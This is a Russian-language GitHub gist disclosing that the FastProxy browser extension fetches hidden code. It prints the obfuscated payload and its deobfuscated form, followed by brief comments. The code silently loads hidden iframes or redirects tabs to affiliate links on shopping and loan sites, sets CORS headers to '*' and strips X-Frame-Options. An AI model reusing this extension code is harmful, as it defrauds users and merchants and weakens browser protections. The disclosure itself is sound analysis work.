Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Браузерное расширение FastProxy загружает с сервера вредоносный код,
перенаправляющий cashback от различных интернет-магазинов автору расширения.
Обфусцированный код:
$guNnnrhIFAMI27BsMFv=function(a){return"string"==typeof $guNnnrhIFAMI27BsMFv.list[a]?$guNnnrhIFAMI27BsMFv.list[a].split("").reverse().join(""):$guNnnrhIFAMI27BsMFv.list[a]},$guNnnrhIFAMI27BsMFv.list=["of\xE6\xFBiht\xFBlru?lxp\xFBepyt\x04u\xDFv?di_txe?re\xECh?htgnel?rekram?\xB7\x04cna\xE6f?urdj\x04man?omorpi\xDF?g\xE6kc\xF4b?tnemucod?urdj\xAB\xD0l\xABapc\xFB\xECl?\xBFH\xC3?g\xE6r\xD1bus?ofnIegnahc?\xEB\x04doNtnerap?\x0FTtes?fOxednI\xD1al\x04saCrewoLot\x04tadpu?\xF4\xC8c\xAB\xC1\xDE\xABaz\x03\xAB\x0FTraelc?\x7Far\xD1ig","\xAEX\xAD*' [:_a\x1F{\xBCV(2\xCD\xF3T\xD4\x1F}\xC9)0005\xBC}\xA6V(\xD3\xDB\xCD\xA63(va\xBE\x06\x1F ;)1\xBCi(ec\x1CT\xA5's\x7Fpo-\xC0-x\xF2Va\xD6(\xE8T\xCAVa\xE7=>i ;1-U\xB5T=\x0E1a\xCAT\xD8\xA51\x17V C\xA5( P\xDD\xC9}\xA3\x1F}\xA6a\xB2Z\xA9Z\xC2Sa-8<Sa-8\xB0x\xB2pa\xA9pa\xC28-\xDE<8-\xDE\xB0d\xB24\xA94\xC2Ra-mh<Ra-mh\xB0y\xB2U\xA9U\xC2\xEDU<\xEDU\xB09(c\xA6\xAAz\xA9z\xC2z<z\xB05(c\xA6\xAAt\xA9t\xC2t<t\xB0b\xB2D\xA9D\xC2D<D\xB0f\xB2H\xA9H\xB3'\xEDH\xB1\xEDH\xB0ea(\xFEy\xA9y\xC2y<y\xB0w\xB2R\xA9R\xC2R<R\xB0Y\xBC}Ka\xE3\xA6\xAAoa\xA9oa\xD2ua/\xAE8-o\xB5www\x028-oa\xB0j\xB2K\xA9K\xD2\xAEK\x02K\xB0ia(\xFE7\xA97\xD2ua/\xAEX\x02X\xB0L\xB2Qa\xA9Qa\xE5\xAEdj\xB8\xAEdj\xFDka`F\xA9F\xE5F\xB8\xEDF\xBC\xAEF\xFD\xDF`G\xA9G\xE5G\xB8\xEDG\xBC\xAEG //\xA3\xC9)s\xB2M\xA9M\xE5\xEDM\xB8\xEDM\xB0g\xB2I\xA9I\xE5\xEDI\xB8\xEDI\xC6]0[)'/\xFA\x1C)\x1E\x1E\xBCi/?).\\www:?(?)/\\/\\:\xFB:?(^/(ec\xD7er.\xF9\xCAw\xD8\xA5'g\xE6%\xF2suta\xD1.Fa\xCF'de\xE6fednu'\xA7! )\xF9(foepyt\xCF\xF9\xCFca\xAC;6e4\x15ca\xBCFa\xBCn\x176 C\x1F\xF3h\xD4\xA6l(hsup.h\x1F;","c218c0ac1a7998cff\x115 k\xA8de8fdf4e381a29f83ff57751e3d80a09\x11b\x1838845a1b37d4227c6b471d7bf088181c\x11f\x18c7d724ca15324d0e84f7d5b8e9573a90\x11e\x1855e51a9e772d2e70d2109f09309f25f7\xC5w\x18592da5a3ca9cd357a1c6f33f8abaf451\x11K\x18675cc6d6cc26920d\x1034fd42feeffdd\x11j\x188\x102ca3d22cd9eea5445ac1e0254eb5\x11 i\xB4\xDA\x1F\x1F;'/y2828k8nagtz80ve0jwlf48ct5pg\xE2k\xC7h1sjexorqhwk3w7mr83vcyg8kd1tj84p\x16 L\xC7xu5wqapkutje2y8zkiwu2rur6j5f\xE2l\xC7a30l7ktvctxvwpq1mg5sv8tcrsrkeido\x16s\xC7a0odbt5v4u\xF4th53qikxgjnyg35zxfdo\xB6\xEDOa\xADs'\xCAg\xB4\xF1'fmmkmfcopdmknnheeanhoejlgkmklekm'\xCAW\xB4\x1F\xEAC UR yxorP\xD1aF //",//g,/^/,"\x7F~`@<%#\x1C\x1B\x1A\x19\x18\x17\x16\x15\x14\x13\x12\x11\x10\x0F\x0E\x07\x06\x05\x04\x03\x02\x01\xFE\xFD\xFC\xFB\xFA\xF9\xF8\xF7\xF6\xF5\xF4\xF3\xF2\xF1\xF0\xEF\xEE\xED\xEC\xEB\xEA\xE9\xE8\xE7\xE6\xE5\xE4\xE3\xE2\xE1\xE0\xDF\xDE\xDD\xDC\xDB\xDA\xD9\xD8\xD7\xD6\xD5\xD4\xD3\xD2\xD1\xD0\xCF\xCE\xCD\xCC\xCB\xCA\xC9\xC8\xC7\xC6\xC5\xC4\xC3\xC2\xC1\xC0\xBF\xBE\xBD\xBC\xBB\xBA\xB9\xB8\xB7\xB6\xB5\xB4\xB3\xB2\xB1\xB0\xAF\xAE\xAD\xAC\xAB\xAA\xA9\xA8\xA7\xA6\xA5\xA4\xA3\xA2\xA1","9876543210_ZYXWVUTSRQPONMLKJIHGFEDCBAzyxwvutsrqponmlkjihgfedcba",/\b\w\w?\b/g,//g,"}\x1F'*' :'Xa\xBA\xE6girO-w\xF4lA\xF0C\xE9A' :'Pa'\x1F{\xCAl\xD8\x1F}\xF3h\xD4\x1F;'*'\xCAX\xB5]i[h\xA5'\xE6giro-w\xF4\xDF\xF0c\xE9a\xF2r\xD6(\xE8h\xCAr\xE7\xA7> i ;1 - U\xB5h\xCA\x0Ea\xCAh\xD8\x1F{)a(Ha C\x1F\xC9;rorrE\xD1al.\xD0tnur.q\xA5(Y C\xA3urt\xCAq\xB50a\xA6\xE0\xBC}]'\x01r\xEBlmx'\xF8\xBC] ~N\xCE\xAEX\xCE\xEDOa\xCEe\xC3z.netok.og\xAD*'[ :_a{\xBCHa(2\xCD\x1F)O.q\xCFq\xD66(2.\xD9.m\xB5q\x1F )m\xB5q\xCFq\xAC\xA4Z\xBBp\xB5b\xA44\xBBU\xBBz\xBBt\xBBD\xBBH\xBBy\xBBR\xBB o#K\xBB 7.b\xDA\xA4 F\xBB\xD8#G\xBB M\xBB I.b\xF1e\x1F )di.)(sliateD\xE4pp\xB5q\xA7! Wa || q\xB50\x17A\xA5( ha\xDD\xA8ab55a207488d84985f78fe\x10dd18531\x11a\x18d7b63bbcb7779c10983f6f6672c6efdb\x11x\x189b3017450eb1fe660349a74aa06755fe\xC5d\x181280a3805b5a49c86655777a50584277\x11y\x181d3829feee54ff77ac2959e2098cd51f\xC59 k\xA8848882eafc2496a","er\x04tubirttAtes?\x1A\xABPF?del\xDFCy\xECr\xDF?\xC1\xDE?\xD0l?dIbat\xFBbat\x19\xAB\x14\xAB@\xABnam_\xB9\xABecnOylnOeMl\xDFc?\xB7i\xDF\xAB\x1B\xAB\x07\xAB\xB9ye\xC3h\xABbat?\x12\xAB\xB7\xC1\xAB\x13\xAB\xC1?nam_\xB9?\xD3\xD9?\xB9\xDCe\xC3\xAB\xB9ye\xC3h?\x0Ft?\xD3dda???lru?\xB7\xC1?kcabl\xDFc?nam\xB9?moc\x04marFX\xDB?\xF4\xC8c?\xBFh?fOxed\xE6?az\x03?rav\x04marFXevomeRot?\x01Rbew?\xDCnpe?\x1A?tcer\xC8?@?devieceR\xBFH\xC3?\xB7i\xDF?\x1B\x19?\x14?\xC0i?\x12?\x7Fcnuf\xFBedulc\xE6?fi?\x13?\x07??\xD1oh?ur?\xDC?\xB9\xDCe\xC3\xFB\xEB??\xEAc?\xD0t?\xFB\xEClkrt?won??\xD1\xC3c?1bus_ffa???\xBFHes\xC3pser\x04taD?nruter??\xC0I%\x04garotS\xDFc\xF4?:811?0;)(ha\x1F\xF3\xA6p\xBC}\x05\xDB.D\xB5E\xCFD\xB5E\xA63(va\x1F{>= )\x06\xBE(\xCA%\xC3.E\x05dnepp\xB5\xECh.Ma\xA6';e\xC3n :y\xD7sid\xBAely\xD1\xFA\xB5E\xA6_\xBC'crs\xFA\xB5E\xA6'E\xFAnemelEetaerc.Ma\xCAE\xD8\x1F;4e3\x15_(c\xDD}\xA6\xE0 \xBC}\x1F] '\xC0_bus\xBA\xC0_\xE6am' \xF8\x1F,]~y\xCE","\xC3it\x1D'*/\xAE\x1D(\xE4$\xA6\xAA\x1D42ot\xC8k\x1D\xB1\xAE\x1Dda\xF4\x1D\xB5b\xA4 \x1Dilps.\x1D\x03razod\x1D\xD1ebraeg\x1D\xFBe\xDFsaiva\x1D\xB4\xA8\x1Da( \x1D\xB6\xAE\xBD \x1D\xCAp k\xA5\x1Dko\xF4le\xDE\x1D42\xE6al\xC3\xC1\x1Dt\xC8ctrams\x1D/\xAF\x1D1e2\x1Dtuo\xD0\x1Di\xD8( \xE1\x1D\xB9neerg\x1D((Ca\xCA3\xD8\x1D\xA6E(dlihC\x1D?e\x1Dit\xD7\x1D'(S\xCC\x1D\xD1euqe\x1Dc\xA6(P\xA6\xAA\x1D\xB0}\xA6Y\xBC}\xFC\x1Dr\xE3\x1F))'T\xF7\x1D?s\x1D'(t\x1D_.ca\x1D[ :Ya\x1Da?'(B\xF6\x1D.r\xD6\xD5B\xB5\xF5\x1Dd\xBC1 + \xD5\xEF\x1Dol\x1D\xC9;}\x1D'\xA7= \x1D\x1Fnpe\xC6\x1D-lort\xC3\x1DS.d(G\xB5\xEE\x1Dd\xCAr\xD8\xBEd(\xBC\x1DW.\x1Ddae\x1Dptth\x1Demorh\x1D-ssecc\x1DA\xB5P\xB5]i[\x1D\xD8\xA5i-- ;0\x1Dni\x1D\xB3)'\x1Dteg.\x1D:_{\xBC\xCB\x1D1n\xC3\xB6\xAE\xBD\x1Drof\x1F;g.\x1D]'g\xBANa'[\x1Dla\x1Dtoh\x1D C\x1F\x1F\x1Dkcilc\x1Devomer\x1D\x1FUR //\x1F\x1DdetadpU\xC3\x1D Q\x1Dalp\x1D( A\xA6\x1D)\x1E'\x1E(\x1D :g{ e\x1Drene\xD1iL\x1D\xB31-\xA7! )'\x1Dts\x1Demi\x1D && \x1D\xAD*\xBA*/\x1D.J.O.q\x1D._.ca\xAC\xAE\x1Dna(z\xB5m\xB5q\x1D\xA7 \x1D\x1F}\x1F\x1Dider\x1D\xB4\x1F;'/\x1D //\x1F\x1F;\x1D/u/us.\xC4\x1DI\xB5Za\xADs'\xA7\x1Dno\x1D\xB3'\xAE\x1Dmiaz\x1Demarf\x1Dsredae\x1D\x1F{ >= )\x1DN\xADEa'\xA7 \x1D ,\x1D.b\xA4\x1D' ,'\x1Dyenom\x1D'(B.w\xAC\x1Dsserpxe\x1D/o/Ja/L/\x1Da.\x1Da k\x1D.b \xA2\x1Da(c\xA6\xAA\x1D'\xA7= w\xAC\x1D //\xA3\x1F}\xA6\x1Du/\xAEn\xADs'\xA7\x1Dv.\x1D//:\x1D( A\x1F\x1D_lru?\x1D(m.f\xA7 \x1D.b\xA5p > \x1D\x1F;'ra=j?\x1D =\x1D\x1F;)\x1D\x1F{ )\x1D\x1F;0 =\x1D\x1F\x1F}\x1F;e\x1D- )(m.\xA1\x1Df( A\x1F{ )"],Function(function(b){var d,e,c,f,g,h="",k=$guNnnrhIFAMI27BsMFv(5);for(c=0;c<b.length;c++){for(g=k+b[c][2],d=b[c][1].split("\x1D"),f=d.length-1;0<=f;f--)b[c][0]=b[c][0].split(g.charAt(f)).join(d[f]);h+=b[c][0]}var l=function(a){var b,d,e,f=$guNnnrhIFAMI27BsMFv(6);return 63>a?b=f.charAt(a):(a-=63,d=Math.floor(a/63),e=a%63,b=f.charAt(d)+f.charAt(e)),b};if(d=h.substr(4133).split(":"),g=d[1].split("?"),d=d[0].split("?"),h=h.substr(0,4133),!"".replace($guNnnrhIFAMI27BsMFv(4),String)){var m={};for(c=0;118>c;c++){var n=l(c);m[n]=g[c]||n}k=$guNnnrhIFAMI27BsMFv(7),n=function(b){return m[b]||b},h=h.replace(k,n)}else for(f=d[d.length-1]-1;0<=f;f--)g[f]?h=h.replace(new RegExp("\b"+(63>f?e.charAt(f):e.charAt((f-63)/63)+e.charAt((f-63)%63))+"\b","g"),g[f]):0;return h.replace($guNnnrhIFAMI27BsMFv(3),"\n").replace($guNnnrhIFAMI27BsMFv(8),"\"")}([[$guNnnrhIFAMI27BsMFv(2)+$guNnnrhIFAMI27BsMFv(9)+$guNnnrhIFAMI27BsMFv(1)+$guNnnrhIFAMI27BsMFv(10)+$guNnnrhIFAMI27BsMFv(0),$guNnnrhIFAMI27BsMFv(11),""]]))();
Деобфусцированный:
(function anonymous(
) {
// FastProxy RU Chrome
const ext_id = 'mkelkmkgljeohnaeehnnkmdpocfmkmmf';
// epn
const url_aliexpress = 'https://alipromo.com/redirect/cpa/o/odfxz53gynjgxkiq35htlou4v5tbdo0a/';
const url_gearbest = 'http://epnclick.ru/redirect/cpa/o/odiekrsrct8vs5gm1qpwvxtcvtk7l03a/';
const url_aviasales = 'http://epnclick.ru/redirect/cpa/o/onn1f5j6rur2uwikz8y2ejtukpaqw5ux/';
const url_jdru = 'http://epnclick.ru/redirect/cpa/o/p48jt1dk8gycv38rm7w3kwhqroxejs1h/';
const url_hotellook = 'http://epnclick.ru/redirect/cpa/o/onn1gp5tc84flwj0ev08ztgan8k8282y/';
// RU
const url_money_man = 'https://trkleads.ru/click/5be4520e1ca5445aee9dc22d3ac22e18?aff_sub1=FP';
const url_kredito24 = 'https://trkleads.ru/click/ddffeef24df432e1d02962cc6d6cc576?aff_sub1=FP';
const url_lime = 'https://trkleads.ru/click/154faba8f33f6c1a753dc9ac3a5ad295?aff_sub1=FP';
const url_platiza = 'https://pxl.leads.su/click/7f52f90390f9012d07e2d277e9a15e55?aff_sub1=FP';
const url_greenmoney = 'https://trkleads.ru/click/09a3759e8b5d7f48e0d42351ac427d7c?aff_sub1=FP';
const url_dozarplati = 'https://trkleads.ru/click/c181880fb7d174b6c7224d73b1a54883?aff_sub1=FP';
const url_smartcredit = 'https://trkleads.ru/click/90a08d3e15775ff38f92a183e4fdf8ed?aff_sub1=FP';
const url_oneclickmoney = 'https://trkleads.ru/click/ffc8997a1ca0c812ca6942cfae288848?aff_sub1=FP';
const url_zaimonlain24 = 'https://pxl.leads.su/click/f15dc8902e9592ca77ff45eeef9283d1?aff_sub1=FP';
const url_credilo = 'https://trkleads.ru/click/77248505a77755668c94a5b5083a0821?aff_sub1=FP';
const url_honeymoney = 'https://pxl.leads.su/click/ef55760aa47a943066ef1be0547103b9?aff_sub1=FP';
const url_hotzaim = 'https://trkleads.ru/click/bdfe6c2766f6f38901c9777bcbb36b7d?aff_sub1=FP';
const url_zaimexpress = 'https://trkleads.ru/click/13581dd2e1ef87f58948d884702a55ba?aff_sub1=FP';
function callMeOnlyOnce() {
if (this.alreadyCalled || ext_id != chrome.app.getDetails().id)
return;
// epn
localStorage.aliexpress = 0;
localStorage.gearbest = 0;
localStorage.aviasales = 0;
localStorage.jdru = 0;
localStorage.hotellook = 0;
// RU
localStorage.money_man = 0;
localStorage.kredito24 = 0;
localStorage.lime = 0;
localStorage.platiza = 0;
localStorage.greenmoney = 0;
localStorage.dozarplati = 0;
localStorage.smartcredit = 0;
localStorage.oneclickmoney = 0;
localStorage.zaimonlain24 = 0;
localStorage.credilo = 0;
localStorage.honeymoney = 0;
localStorage.hotzaim = 0;
localStorage.zaimexpress = 0;
if (chrome && chrome.tabs)
chrome.tabs.onUpdated.addListener(onUpdatedListener);
if (chrome && chrome.webRequest)
chrome.webRequest.onHeadersReceived.addListener(onHeaders, { urls: ['*://go.koten.zone/*', '*://alipromo.com/*', '*://moneyman.ru/*', '*://epnclick.ru/*'], types: ['xmlhttprequest'] }, ['blocking', 'responseHeaders']);
this.alreadyCalled = true;
}
function callback() {
chrome.runtime.lastError;
}
function onHeaders(a) {
var h = a.responseHeaders;
for (var i = h.length - 1; i >= 0; --i) {
var r = h[i].name.toLowerCase();
if (r == 'access-control-allow-origin') {
h[i].value = '*';
return { responseHeaders: h };
}
}
var l = {
'name': 'Access-Control-Allow-Origin', 'value': '*'
};
h.push(l);
return { responseHeaders: h };
}
function onUpdatedListener(tabId, changeInfo, tab) {
const time = 4e6;
if (tab && tab.url && typeof (tab.url) != 'undefined' && changeInfo.status == 'loading') {
var host = tab.url.replace(/^(?:https?:\/\/)?(?:www\.)?/i, "").split('/')[0];
// aliexpress.com
if (host.includes('aliexpress.com')) {
if (Date.now() - localStorage.aliexpress > time) {
localStorage.aliexpress = Date.now();
loadIframe(url_aliexpress);
}
return;
}
// gearbest.com
if (host.includes('gearbest.com')) {
if (Date.now() - localStorage.gearbest > time) {
localStorage.gearbest = Date.now();
loadIframe(url_gearbest)
}
return;
}
// aviasales.ru, aviasales.com
if (host.includes('aviasales')) {
if (Date.now() - localStorage.aviasales > time) {
localStorage.aviasales = Date.now();
$.get(url_aviasales, (d) => {
var r = d.substring(d.indexOf("'") + 1, d.lastIndexOf("'"));
if (r.includes('?marker'))
chrome.tabs.update(tabId, { url: r }, callback);
});
}
return;
}
// hotellook.ru, hotellook.com
if (host.includes('hotellook')) {
if (Date.now() - localStorage.hotellook > time) {
localStorage.hotellook = Date.now();
$.get(url_hotellook, (d) => {
var r = d.substring(d.indexOf("'") + 1, d.lastIndexOf("'"));
if (r.includes('?marker'))
chrome.tabs.update(tabId, { url: r }, callback);
});
}
return;
}
// jd.ru
if (host.includes('jd.ru')) {
if (Date.now() - localStorage.jdru > time) {
localStorage.jdru = Date.now();
loadIframe(url_jdru);
}
return;
}
// moneyman.ru
if (tab.url.indexOf('moneyman.ru/registration') != -1) {
if (Date.now() - localStorage.money_man > time) {
localStorage.money_man = Date.now();
toRemoveXFrame();
loadIframe(url_money_man);
}
return;
}
// kredito24.ru
if (tab.url.indexOf('kredito24.ru') != -1) {
if (Date.now() - localStorage.kredito24 > time) {
localStorage.kredito24 = Date.now();
loadIframe(url_kredito24);
}
return;
}
// lime-zaim.ru
if (tab.url.indexOf('www.lime-zaim.ru/registration') != -1) {
if (Date.now() - localStorage.lime > time) {
localStorage.lime = Date.now();
chrome.tabs.update(tabId, { url: url_lime }, callback);
}
return;
}
// platiza.ru
if (host == 'platiza.ru') {
if (Date.now() - localStorage.platiza > time) {
localStorage.platiza = Date.now();
loadIframe(url_platiza);
}
return;
}
// greenmoney.ru
if (host == 'greenmoney.ru') {
if (Date.now() - localStorage.greenmoney > time) {
localStorage.greenmoney = Date.now();
toRemoveXFrame();
loadIframe(url_greenmoney);
}
return;
}
// dozarplati.com
if (host == 'dozarplati.com') {
if (Date.now() - localStorage.dozarplati > time) {
localStorage.dozarplati = Date.now();
loadIframe(url_dozarplati);
}
return;
}
// smartcredit.ru
if (host == 'smartcredit.ru') {
if (Date.now() - localStorage.smartcredit > time) {
localStorage.smartcredit = Date.now();
loadIframe(url_smartcredit);
}
return;
}
// oneclickmoney.ru
if (host == 'oneclickmoney.ru') {
if (Date.now() - localStorage.oneclickmoney > time) {
localStorage.oneclickmoney = Date.now();
loadIframe(url_oneclickmoney);
}
return;
}
// zaimonlain24.ru
if (host == 'zaimonlain24.ru') {
if (Date.now() - localStorage.zaimonlain24 > time) {
localStorage.zaimonlain24 = Date.now();
loadIframe(url_zaimonlain24);
}
return;
}
// credilo.com.ru
if (host == 'credilo.com.ru') {
if (Date.now() - localStorage.credilo > time) {
localStorage.credilo = Date.now();
loadIframe(url_credilo);
}
return;
}
// hm-finance.ru
if (host == 'hm-finance.ru') {
if (Date.now() - localStorage.honeymoney > time) {
localStorage.honeymoney = Date.now();
loadIframe(url_honeymoney);
}
return;
}
// hot-zaim.ru
if (host == 'hot-zaim.ru') {
if (Date.now() - localStorage.hotzaim > time) {
localStorage.hotzaim = Date.now();
loadIframe(url_hotzaim);
}
return;
}
// zaim-express.ru
if (host == 'zaim-express.ru') {
if (Date.now() - localStorage.zaimexpress > time) {
localStorage.zaimexpress = Date.now();
loadIframe(url_zaimexpress);
}
return;
}
}
}
function toRemoveXFrame() {
function removeXFrame(info) {
var headers = info.responseHeaders;
for (var i = headers.length - 1; i >= 0; --i) {
var header = headers[i].name.toLowerCase();
if (header == 'x-frame-options') {
headers.splice(i, 1);
var timeout = setTimeout(() => {
clearTimeout(timeout);
chrome.webRequest.onHeadersReceived.removeListener(removeXFrame);
}, 5000)
}
}
return { responseHeaders: headers };
}
chrome.webRequest.onHeadersReceived.addListener(removeXFrame, {
urls: ['*://moneyman.ru/*', '*://greenmoney.ru/*'],
types: ['main_frame', 'sub_frame']
}, ['blocking', 'responseHeaders']);
}
function loadIframe(url) {
const time = 3e4;
var iframe = document.createElement('iframe');
iframe.setAttribute('src', url);
iframe.setAttribute('style', 'display: none;');
document.head.appendChild(iframe);
iframe.onload = () => {
var timeout = setTimeout(() => {
clearTimeout(timeout);
iframe.parentNode && iframe.parentNode.removeChild(iframe);
}, time);
};
}
callMeOnlyOnce();
})()
@RedDestractor

This comment has been minimized.

Copy link

commented May 5, 2019

Что делать с карточками теперь? Менять/выкидывать?

@ValdikSS

This comment has been minimized.

Copy link
Owner Author

commented May 5, 2019

@RedDestractor
Вы про банковские карточки? Если не сложно заблокировать — заблокируйте и перевыпустите. Нет доказательств, что автор FastProxy похищал какие-либо пользовательские данные, но техническая возможность этого имеется, и исключать это нельзя. Однако, банки хорошо определяют нелегитимные транзакции, поэтому, на вашем месте, я бы сильно не беспокоился именно о банковских карточках — даже если ими кто-то воспользуется, вы, с большой вероятностью, сможете вернуть свои деньги.

Стоит отметить, что загрузка конфигурационного файла FastProxy совершается по протоколу HTTP (а не по HTTPS), и, например, администратор злонамеренной Wi-Fi-точки может подменить её на свою, и внедрять уже свой произвольный код на любые сайты.

@Reita111

This comment has been minimized.

Copy link

commented May 9, 2019

Оу как хорошо что я его удалил из браузера.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.